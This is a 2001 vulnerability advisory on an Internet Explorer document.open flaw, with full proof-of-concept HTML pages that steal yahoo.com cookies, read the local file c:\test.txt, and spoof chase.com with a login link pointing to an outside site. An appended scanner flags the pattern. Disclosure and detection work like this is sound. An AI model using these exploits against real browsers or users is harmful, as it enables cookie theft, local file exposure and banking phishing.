


Internet Explorer document.open method allows access to local files and cookies



20th Dec 2001 [SBWID-4944]
COMMAND

	IE document.open method allows access to local files and cookies

SYSTEMS AFFECTED

	 Tested on :

	 IE 6.0.2600.0000 + Windows 2000 Update Versions:Q312461,Q240308,Q313675

	 IE 5.5 SP2

	 IE 5.50.4807.2300

PROBLEM

	the Pull published [http://www.osioniusx.com]:


	By simply using the document.open method and not using the
	document.close method you are able to: steal cookies; read local files
	that are parsable by IE (mime type text/html to be exact); and spoof
	sites.
	

	Exploits on: http://www.osioniusx.com


	"cookieStealing.html" - This opens Yahoo.com and steals the cookie.
	

	<html>
	<head>
	<title>Cookie Stealing</title>
	</head>
	<body>
	<P>This page shows how this bug can be used to steal cookies. For this example
	I use yahoo.com and a five second timeout (wait five seconds after the window
	opens). Cookie stealing can result in impersonation, stealing of Credit Card
	numbers, etc.
	<script>
	// document.open() called with a URL behaves like window.open() here and
	// returns the new window, which IE does not subject to the usual
	// cross-domain check
	var y = document.open( "http://www.yahoo.com", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );
	// after the remote page has loaded, read its cookie through the handle
	setTimeout('alert(y.document.cookie);y.close();',5000);
	</script>
	</P>
	</body>
	</html>

	

	

	"FileReading.html" - This opens up C:\test.txt and then reads it.
	

	<html>
	<head>
	<title>File Reading</title>
	</head>
	<body>
	This page shows local file reading with this bug. The file being read is c:\test.txt.
	This could be used to gather various types of passwords, and other local information you do not
	want malicious, remote users to have.
	<script>
	// same window.open-style call, this time with a local drive path
	var y = document.open( "c:/test.txt", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );
	// once the file is rendered, read its contents back through the handle
	setTimeout('alert(y.document.body.innerHTML);y.close();',1000);
	</script>
	</body>
	</html>

	

	

	\"SiteSpoofing.html\" - This spoofs www.chase.com  --  chase.com  is  in
	the url, the title, and there is a link on the page to log  on  to  your
	account which comes back to www.osioniusx.com.
	

	<html>
	<head>
	<title>Web Site Spoofing</title>
	</head>
	<body>
	<script>
	// replacement content to be written into the chase.com window
	s='<title>Chase</title>Chase Bank content could go here <br><br><a href=http://www.osioniusx.com/>LogOn To Your Bank Account</a>';

	// open the real site so its URL is shown in the location bar
	var y = document.open( "http://www.chase.com", "x", "status = yes, location = yes,resizable = yes, toolbar=yes, directories=yes,menubar=yes" );
	// then overwrite the page body while the location bar still shows chase.com
	setTimeout('y.document.write(s);',500);
	</script>
	</body>
	</html>

	

	

	Update by Rogan Dawes:


	if you use an "https://" URL, it also shows THAT in the location bar.


	Naturally, there are no SSL indicators (padlock, Secure properties,
	etc).


	For the paranoid among us (i.e. you have the alerts turned on), IE DOES
	warn that you are entering and then LEAVING a secure session, but the
	fact remains that the Location field shows "https://"


	It doesn't seem to work for documents containing frames, however.


	And you can get the logo to stop spinning by doing the document.close
	inside the timeout call. (If you look at the source of the spoofed page
	demo, you'll see what I mean.)
	

	 Update

	 ======

	

	Jelmer posted recently a similar exploit and "the Pull" added:


	Jelmer's:


	"extDoc = document.open('file:///C:/jelmer.txt','jelmer','height=200,width=400,status=no,toolbar=no,menubar=no,location=no');"


	mine:

	var y = document.open( "c:/test.txt", "x", "width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes" );


	It doesn't matter if it is "cmd = 'extDoc.execScript("alert(document.body.innerText)", "Jscript");';" that is able to read the code or this:

	setTimeout('alert(y.document.body.innerHTML);y.document.close();',1000);

	-- they are just the same thing.
	

	(ref: http://www.osioniusx.com document.write()) bug.

	

	Basically, the problem  is  that  when  the  document.write()  uses  the
	window.open() method as described on the msdn  website  for  the  method
	here:
	

	http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/open_1.asp
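	Added example, not code from the advisory or from osioniusx.com: a small scanner for captured HTML that flags the document.open() misuse described above, for use when reviewing saved pages or proxy logs. It assumes the documented DOM form of document.open() takes no arguments or a MIME type, so a call whose first argument is a URL or drive path is the window.open-style form this advisory abuses; the sample pages and the placeholder host are constructed.

```javascript
// Added example, not part of the advisory. Flags document.open() calls whose
// first argument is a URL or drive path (the DOM form takes no argument or a
// MIME type such as "text/html") and follow-on reads of another window's
// document, the two halves of the pattern shown in the advisory.
const OPEN_CALL = /document\.open\s*\(\s*(['"])([^'"]*)\1/gi;
const URL_LIKE = /^(?:[a-z][a-z0-9+.-]*:\/\/|[a-z]:[\\/]|file:)/i;
// y.document.cookie, extDoc.document.body, ...; the page's own window/self excluded
const FOREIGN_DOC_READ = /\b(?!(?:window|self)\b)[A-Za-z_]\w*\.document\.(cookie|body)\b/;
const EXEC_SCRIPT = /\.execScript\s*\(/;

// Pull the bodies of all <script> elements out of an HTML string.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) scripts.push(m[1]);
  return scripts;
}

// Returns one finding per suspicious construct, in source order.
function scanHtml(html) {
  const findings = [];
  for (const js of extractScripts(html)) {
    OPEN_CALL.lastIndex = 0;
    let m;
    while ((m = OPEN_CALL.exec(js)) !== null) {
      if (URL_LIKE.test(m[2])) {
        findings.push({ kind: 'document.open-with-url', target: m[2] });
      }
    }
    if (FOREIGN_DOC_READ.test(js) || EXEC_SCRIPT.test(js)) {
      findings.push({ kind: 'cross-window-document-read' });
    }
  }
  return findings;
}

// Constructed samples: the advisory's pattern with a placeholder host, and a benign page.
const SUSPICIOUS_PAGE = `<html><body><script>
var y = document.open("http://example.invalid/", "x", "width=400,height=400");
setTimeout('alert(y.document.cookie);y.close();', 5000);
</script></body></html>`;
const BENIGN_PAGE = `<html><body><script>
document.open("text/html");
document.write("<p>" + document.cookie.length + "</p>");
document.close();
</script></body></html>`;
```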

	

SOLUTION

	None yet.

